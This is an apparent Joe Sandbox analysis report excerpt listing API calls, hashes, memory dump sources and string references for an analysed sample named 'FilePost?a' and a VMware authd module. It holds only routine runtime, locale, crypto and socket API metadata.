                                          • Opcode ID: 23328ae864bb3bfc3d794d276ead9774f5b48b799307a9990ec85ee2f7d47b6b
                                          • Instruction ID: 2534a369cc84a20ad55fae827e242cfc4156d237ca1fd6d2466d962d2bd8cc97
                                          • Opcode Fuzzy Hash: 23328ae864bb3bfc3d794d276ead9774f5b48b799307a9990ec85ee2f7d47b6b
                                          • Instruction Fuzzy Hash: 2C31E4749012699BCB21DF64D8887DCBBB8BF19314F5042EAE51CA7290E7B09B818F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,6D179140,?,00000001,?,?), ref: 6D179163
                                          • TerminateProcess.KERNEL32(00000000,?,6D179140,?,00000001,?,?), ref: 6D17916A
                                          • ExitProcess.KERNEL32 ref: 6D17917C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: eece246680fc6cc76aee4cf5c16baee870af7df2dd91eb4afbbac2ae714aa927
                                          • Instruction ID: b5ab9ffc5de450f0ab651ec34a763dfadc081364a37bb8538832e9315bdc236b
                                          • Opcode Fuzzy Hash: eece246680fc6cc76aee4cf5c16baee870af7df2dd91eb4afbbac2ae714aa927
                                          • Instruction Fuzzy Hash: 6CE08C71000649AFCF22AF60DC1CB5C3B79FB4A292B100014F916C6131CBB5ED92DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CryptGenRandom.ADVAPI32(?,?), ref: 6D151E92
                                            • Part of subcall function 6D151A70: GetLastError.KERNEL32(9726ABD3,75A8FC30,?), ref: 6D151AB8
                                            • Part of subcall function 6D168F50: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,?,6D1666CB,?,6D1A6AC8,00000000,?,00000000,?,?,?), ref: 6D168FB0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CryptErrorExceptionLastRaiseRandom
                                          • String ID: CryptGenRandom
                                          • API String ID: 1262793447-3616286655
                                          • Opcode ID: 3c6b776b6114f82fb1a139d7bb9bb3cf6914a1e091dbe3835d4875c155244cb1
                                          • Instruction ID: a45980585ff0cf52f1e60471384005cbad16c16071bb666ba9047b7b4c01f28b
                                          • Opcode Fuzzy Hash: 3c6b776b6114f82fb1a139d7bb9bb3cf6914a1e091dbe3835d4875c155244cb1
                                          • Instruction Fuzzy Hash: 6F210BB1844248EFCB11DFA4CC04FED7BB4FB15324F01466AE92167688DBF86950CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0BF
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0F5
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D186E3F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free$InfoLocale
                                          • String ID:
                                          • API String ID: 2003897158-0
                                          • Opcode ID: a7aeeea20bf51867820791ee9afa6ee12d2b4f0dfdaefb9d63bb633076fc53f0
                                          • Instruction ID: 2f2b4b25bdbddb9f414096a53dd899eb90a89a8d3eedcecd6f0d2914e4ae1283
                                          • Opcode Fuzzy Hash: a7aeeea20bf51867820791ee9afa6ee12d2b4f0dfdaefb9d63bb633076fc53f0
                                          • Instruction Fuzzy Hash: 0021C571A6930AABEB18DA24DC41E7A33B8EF15315F10407AEE15C6149EBB5E940CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          • EnumSystemLocalesW.KERNEL32(6D186B98,00000001,00000000,?,-00000050,?,6D1871C6,00000000,?,?,?,00000055,?), ref: 6D186AE4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 55559a53a83d0be9146ab6a7c3d69f05cfdae9957235fefb0b7533e571c2da00
                                          • Instruction ID: 034441792d70077e08af69d44d27fc35412d93dfdd2327e6e220289c4db6049b
                                          • Opcode Fuzzy Hash: 55559a53a83d0be9146ab6a7c3d69f05cfdae9957235fefb0b7533e571c2da00
                                          • Instruction Fuzzy Hash: 8C1129362183059FDB08DF38C89067ABBA1FF84319B15842DD54747A01D3B1B902CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6D186E95,00000000,00000000,?), ref: 6D187043
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale
                                          • String ID:
                                          • API String ID: 3736152602-0
                                          • Opcode ID: f74be3d23d83d2957045a3780d40e0fdeab768e04298a7fa207a48a26b5d6bae
                                          • Instruction ID: 5efc2307821c48705e232500a0a04bba8ba7237c90d1231a4f4f454ab8e1085a
                                          • Opcode Fuzzy Hash: f74be3d23d83d2957045a3780d40e0fdeab768e04298a7fa207a48a26b5d6bae
                                          • Instruction Fuzzy Hash: AAF04932F10116ABDB14C6A4CC05BBA7768EB51394F01042AED25A3189EBF1FD02CA90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0BF
                                            • Part of subcall function 6D17B05D: _free.LIBCMT ref: 6D17B0F5
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6D1869D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free$InfoLocale
                                          • String ID: utf8
                                          • API String ID: 2003897158-905460609
                                          • Opcode ID: 92e3711362fbed37adc95cbcc0239782ac7a2dca0a92aad1411ece39308d1f3f
                                          • Instruction ID: cc9030fd58757e6ef137550e254f0716019843da4eb443f005b4bc189731446b
                                          • Opcode Fuzzy Hash: 92e3711362fbed37adc95cbcc0239782ac7a2dca0a92aad1411ece39308d1f3f
                                          • Instruction Fuzzy Hash: BAF02832A14209ABC714DB74DD45EBA33BCDF46314F11017AE616D7285EBF4AD048790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          • EnumSystemLocalesW.KERNEL32(6D186DEB,00000001,?,?,-00000050,?,6D18718A,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6D186B57
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 359772c1b059e2507bc697c8e1cb913399aecedb8f6354fd670edc4dd4e6b338
                                          • Instruction ID: 48b2698dc8f1c7938b6b5875b5b3fcccad01c99b41fc8717f98f73a6ed0fa1ba
                                          • Opcode Fuzzy Hash: 359772c1b059e2507bc697c8e1cb913399aecedb8f6354fd670edc4dd4e6b338
                                          • Instruction Fuzzy Hash: 2AF022723083095FD7148E348C84E7A7BA1EF8172CF05442CFA464B685C7B1AC02CA80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D1776E2: EnterCriticalSection.KERNEL32(?,?,6D178FB7,?,6D1A7058,00000008,6D179130,00000001,?,?), ref: 6D1776F1
                                          • EnumSystemLocalesW.KERNEL32(6D17EF2D,00000001,6D1A7278,0000000C,6D17F2FB,00000000), ref: 6D17EF72
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                          • String ID:
                                          • API String ID: 1272433827-0
                                          • Opcode ID: 28f44fc18790c939a222142a626495b6bf39a9c625dff9064488a7ce9036a960
                                          • Instruction ID: a929eda455ca7694a0d5b86170eb6fe0f2608777e38c06e67115515b9142deee
                                          • Opcode Fuzzy Hash: 28f44fc18790c939a222142a626495b6bf39a9c625dff9064488a7ce9036a960
                                          • Instruction Fuzzy Hash: 11F04972A04201DFDB10CF98E448BAC7BF1FB4A726F20411AF610DB2A4D7FA5A40CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 6D17B05D: GetLastError.KERNEL32(?,?,?,6D17D632,?,00000001,6D173A72,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000), ref: 6D17B062
                                            • Part of subcall function 6D17B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D17DAEC,00000001,?,?,?,6D1739A1,?,00000000,00000000,6D1A6E90,0000002C,6D173A72), ref: 6D17B100
                                          • EnumSystemLocalesW.KERNEL32(6D186980,00000001,?,?,?,6D1871E8,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6D186A5E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 60acb19f0043a2febd624ebe49a282aa6b930b50584e9e6b9887ea02e7fc891c
                                          • Instruction ID: a635926abf28ae30c08854a95aca40734d93460adaa818078aa1339bc2f14a8e
                                          • Opcode Fuzzy Hash: 60acb19f0043a2febd624ebe49a282aa6b930b50584e9e6b9887ea02e7fc891c
                                          • Instruction Fuzzy Hash: 5AF0E53630420A97CB04DF75D858A7ABFA4EFC2715F0A4099EA198B655C7B29942CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6D17CCB8,?,20001004,00000000,00000002,?,?,6D17C2C5), ref: 6D17F433
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: b5b5637b0b980e5df05f71c700d4f8f4e3eb7702b623b884ec74f649bcdb0949
                                          • Instruction ID: db10eef822ec47a0b43727ff6c02ba2f2a81d3f25db8a3e6a216dca36cb18e3f
                                          • Opcode Fuzzy Hash: b5b5637b0b980e5df05f71c700d4f8f4e3eb7702b623b884ec74f649bcdb0949
                                          • Instruction Fuzzy Hash: 09E04F75644218BBCF226F60DC04FAF3E2AEF56752F018011FD25A5224CBB189219AD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6D151E13
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ContextCryptRelease
                                          • String ID:
                                          • API String ID: 829835001-0
                                          • Opcode ID: ad69be571be5577f3ef7b8c320029c312db9c5323475bc18eef86069f3833897
                                          • Instruction ID: 3fb2a3f8830622d2c0be2538f421fcb184394f4d1c89d4eae5781ae774559802
                                          • Opcode Fuzzy Hash: ad69be571be5577f3ef7b8c320029c312db9c5323475bc18eef86069f3833897
                                          • Instruction Fuzzy Hash: FED02BB078435117D3224E185C04B8B76D89F12701F00445DB564E6184C7F4C4A0C3A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6D18E68C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ContextCryptRelease
                                          • String ID:
                                          • API String ID: 829835001-0
                                          • Opcode ID: d04bdaf28cc6f2d9a70d299705e1ae762a60a6a082f50f7cf954f072f56e0b93
                                          • Instruction ID: fcce526fa931a23277404947792f75b2efc8c179a35727c22ab43da66076d8b9
                                          • Opcode Fuzzy Hash: d04bdaf28cc6f2d9a70d299705e1ae762a60a6a082f50f7cf954f072f56e0b93
                                          • Instruction Fuzzy Hash: 62B012307003015BEF10DA60AD1CB113EBC6746702F3040407015E2080CBF4D400CA14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          • Opcode ID: e92e242e822031fc3b1de633f917a067e961fb0bd927665d566a1fe043731f42
                                          • Instruction ID: 5105236abe994ce259d71bbb8a95215980e006cda8ee141f59a4369573f1861d
                                          • Opcode Fuzzy Hash: e92e242e822031fc3b1de633f917a067e961fb0bd927665d566a1fe043731f42
                                          • Instruction Fuzzy Hash: 0DA011302022008F8B008E30A38830A3BBAAA0BAA23080028A208C8000EBE880A08B02
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4cd1f5f6c7ee214ed9d0984c116d247a332e82ba7d9299b1f3daff287e58b7e
                                          • Instruction ID: d1a327476482d3ccd68fd2ee7ec9383172e21fbab04d748f8607be1906b88c17
                                          • Opcode Fuzzy Hash: b4cd1f5f6c7ee214ed9d0984c116d247a332e82ba7d9299b1f3daff287e58b7e
                                          • Instruction Fuzzy Hash: 16E08C32A11638EBCB10CBC8C900A9AB3FCEB46B00B154296F611D3115C2B0DE01CBC0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                          • String ID: volatile$0!9n$8 9n$<unknown>$UNKNOWN$Y9n$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                          • API String ID: 1464150960-2368726167
                                          • Opcode ID: d1c613efc02a5923961ce54806f938abf135803f515d52d4be581884efcc0922
                                          • Instruction ID: cd5890df6441b3808bdcba91b796d07ca313b9c2d5224f06529a452c409cdc6b
                                          • Opcode Fuzzy Hash: d1c613efc02a5923961ce54806f938abf135803f515d52d4be581884efcc0922
                                          • Instruction Fuzzy Hash: 53E179B5D0420A9FCB00CFD9D595BEFBBB8EB05304F50825AD661A7240F73A8645EFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Warning.VMWAREBASE(?,?,00000001,?,00000000,003413A6), ref: 0034377C
                                          • WSAGetLastError.WS2_32(?,00000000,003413A6,?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00343787
                                          • WaitForSingleObject.KERNEL32(?,?,?,00000000,003413A6), ref: 003437A8
                                          • Warning.VMWAREBASE(?,?,UTF-8,?,00000000,003413A6), ref: 003438A0
                                            • Part of subcall function 003427C0: GetLastError.KERNEL32(?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 003427D8
                                            • Part of subcall function 003427C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 003427F3
                                            • Part of subcall function 003427C0: Warning.VMWAREBASE(?,0034A850,?,?,00001000,?,00000005,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00342807
                                            • Part of subcall function 003427C0: _printf.MSPDB140-MSVCRT ref: 00342824
                                            • Part of subcall function 003427C0: SetLastError.KERNEL32(00000000,?,?,00343B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0034282D
                                            • Part of subcall function 00342780: Warning.VMWAREBASE(?,000000FF,00000000,00000000,?,003438C9,Data not in UTF-8 format,?,00000003,Line is not in UTF-8. Disconnecting,?,00000000,003413A6), ref: 0034278B
                                            • Part of subcall function 00342780: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000005,Data dump: %s,00000000,00000005,%s,00000003,?,000000FF,00000000,00000000,?,003438C9,Data not in UTF-8 format,?,00000003), ref: 003427AF
                                          • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,003413A6), ref: 003438FC
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,003413A6), ref: 00343919
                                          Strings
                                          • Buffer full. Disconnecting., xrefs: 003437D8
                                          • Input incorrectly terminated., xrefs: 0034387C
                                          • Line missing \r, xrefs: 00343872
                                          • Read a \n without a corresponding \r. Disconnecting., xrefs: 0034385F
                                          • UTF-8, xrefs: 00343899
                                          • Short response (%d). Disconnecting., xrefs: 00343831
                                          • recv timed-out waiting for data on connection. aborting., xrefs: 003437FB
                                          • %s(): reading from closed socket., xrefs: 00343977
                                          • Overflowed buffer, xrefs: 003437E7
                                          • recv() FAIL: %d., xrefs: 00343810
                                          • Input too large., xrefs: 003437F1
                                          • Data not in UTF-8 format, xrefs: 003438BF
                                          • Input not in UTF-8 encoding., xrefs: 003438C9
                                          • VMAuthdSocketRead, xrefs: 003438DD, 00343972
                                          • Input incorrectly terminated., xrefs: 00343840
                                          • Line is not in UTF-8. Disconnecting, xrefs: 003438B0
                                          • %s: read failed. Closing socket for reading., xrefs: 003438E2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4088941987.0000000000341000.00000020.00000001.01000000.00000008.sdmp, Offset: 00340000, based on PE: true
                                          • Associated: 00000003.00000002.4088886858.0000000000340000.00000002.00000001.01000000.00000008.sdmp
